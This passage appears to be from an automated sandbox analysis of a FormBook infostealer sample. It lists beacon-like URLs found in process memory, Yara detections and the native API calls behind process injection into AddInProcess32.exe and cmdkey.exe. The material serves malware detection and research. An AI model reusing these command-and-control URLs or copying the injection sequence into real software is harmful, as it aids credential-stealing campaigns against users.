68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31

Source: RAVCpl64.exe, 00000003.00000002.111799235023.00000000084B8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000050D8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q
Source: RAVCpl64.exe, 00000003.00000002.111799235023.00000000084B8000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000050D8000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://maximumgroup.co.za/cxj4/?v1GdZ=vUN3&AuPF3v=gKtC9mpNHTkTr00OOrlul8C1Q
Source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000864A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.000000000526A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007696000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736760309.0064952172&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY
Source: RAVCpl64.exe, 00000003.00000002.111783922720.0000000000887000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ogbos88.cyou
Source: RAVCpl64.exe, 00000003.00000002.111783922720.0000000000887000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ogbos88.cyou/kj1o/
Source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000864A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.000000000526A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.zbywl.com/js.js
Source: cmdkey.exe, 00000004.00000002.110845588280.00000000042B6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www70.chiro.live/
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: b427-I_1.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: b427-I_1.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RAVCpl64.exe, 00000003.00000002.111799235023.00000000079BA000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.00000000045DA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: cmdkey.exe, 00000004.00000003.107463245182.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000003000000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107463245182.0000000003000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: cmdkey.exe, 00000004.00000003.107463245182.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000003000000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107463245182.0000000003000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: cmdkey.exe, 00000004.00000003.107463245182.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: cmdkey.exe, 00000004.00000003.107463245182.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000003000000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000003.107463245182.0000000003000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: cmdkey.exe, 00000004.00000002.110843266469.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110843266469.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: cmdkey.exe, 00000004.00000002.110843266469.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: cmdkey.exe, 00000004.00000003.107462401308.0000000007EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000008194000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004DB4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ogbos88vip.click
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846786441.0000000007F3E000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846786441.0000000007F3E000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.4.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmdkey.exe, 00000004.00000002.110845588280.000000000558E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe
Source: cmdkey.exe, 00000004.00000003.107468616539.0000000007EDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: b427-I_1.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: RAVCpl64.exe, 00000003.00000002.111799235023.000000000864A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.000000000526A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.110844567942.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107285059805.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.107283483374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.110844494408.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38B3D70 FreeConsole,CreateProcessA,CloseHandle,CloseHandle,NtFreeVirtualMemory,NtAllocateVirtualMemory,TerminateProcess,CloseHandle,CloseHandle,NtWriteVirtualMemory,TerminateProcess,CloseHandle,CloseHandle,NtWriteVirtualMemory,TerminateProcess,CloseHandle,CloseHandle,NtGetContextThread,TerminateProcess,CloseHandle,CloseHandle,NtWriteVirtualMemory,TerminateProcess,CloseHandle,CloseHandle,NtSetContextThread,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,Wow64GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,NtWriteVirtualMemory,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,Wow64SetThreadContext,TerminateProcess,CloseHandle,CloseHandle,NtResumeThread,CloseHandle,	0_2_00007FF6D38B3D70
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38B421B NtWriteVirtualMemory,TerminateProcess,CloseHandle,CloseHandle,	0_2_00007FF6D38B421B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0042CA33 NtClose,	1_2_0042CA33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D34E0 NtCreateMutant,LdrInitializeThunk,	1_2_014D34E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2BC0 NtQueryInformationToken,LdrInitializeThunk,	1_2_014D2BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_014D2B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2A80 NtClose,LdrInitializeThunk,	1_2_014D2A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2D10 NtQuerySystemInformation,LdrInitializeThunk,	1_2_014D2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_014D2EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D4260 NtSetContextThread,	1_2_014D4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D4570 NtSuspendThread,	1_2_014D4570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D29D0 NtWaitForSingleObject,	1_2_014D29D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D29F0 NtReadFile,	1_2_014D29F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D38D0 NtGetContextThread,	1_2_014D38D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2B00 NtQueryValueKey,	1_2_014D2B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2B10 NtAllocateVirtualMemory,	1_2_014D2B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2B20 NtQueryInformationProcess,	1_2_014D2B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2BE0 NtQueryVirtualMemory,	1_2_014D2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2B80 NtCreateKey,	1_2_014D2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2A10 NtWriteFile,	1_2_014D2A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2AC0 NtEnumerateValueKey,	1_2_014D2AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2AA0 NtQueryInformationFile,	1_2_014D2AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2D50 NtWriteVirtualMemory,	1_2_014D2D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2DC0 NtAdjustPrivilegesToken,	1_2_014D2DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2DA0 NtReadVirtualMemory,	1_2_014D2DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2C50 NtUnmapViewOfSection,	1_2_014D2C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2C10 NtOpenProcess,	1_2_014D2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2C20 NtSetInformationFile,	1_2_014D2C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2C30 NtMapViewOfSection,	1_2_014D2C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D3C30 NtOpenProcessToken,	1_2_014D3C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2CD0 NtEnumerateKey,	1_2_014D2CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2CF0 NtDelayExecution,	1_2_014D2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D3C90 NtOpenThread,	1_2_014D3C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2F00 NtCreateFile,	1_2_014D2F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2F30 NtOpenDirectoryObject,	1_2_014D2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2FB0 NtSetValueKey,	1_2_014D2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2E50 NtCreateSection,	1_2_014D2E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2E00 NtQueueApcThread,	1_2_014D2E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2EC0 NtQuerySection,	1_2_014D2EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2ED0 NtResumeThread,	1_2_014D2ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D2E80 NtCreateProcessEx,	1_2_014D2E80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D34E0 NtCreateMutant,LdrInitializeThunk,	4_2_036D34E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2B00 NtQueryValueKey,LdrInitializeThunk,	4_2_036D2B00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_036D2B10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_036D2BC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2B80 NtCreateKey,LdrInitializeThunk,	4_2_036D2B80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_036D2B90
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2A10 NtWriteFile,LdrInitializeThunk,	4_2_036D2A10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2AC0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_036D2AC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2A80 NtClose,LdrInitializeThunk,	4_2_036D2A80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D29F0 NtReadFile,LdrInitializeThunk,	4_2_036D29F0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2F00 NtCreateFile,LdrInitializeThunk,	4_2_036D2F00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2E50 NtCreateSection,LdrInitializeThunk,	4_2_036D2E50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_036D2D10
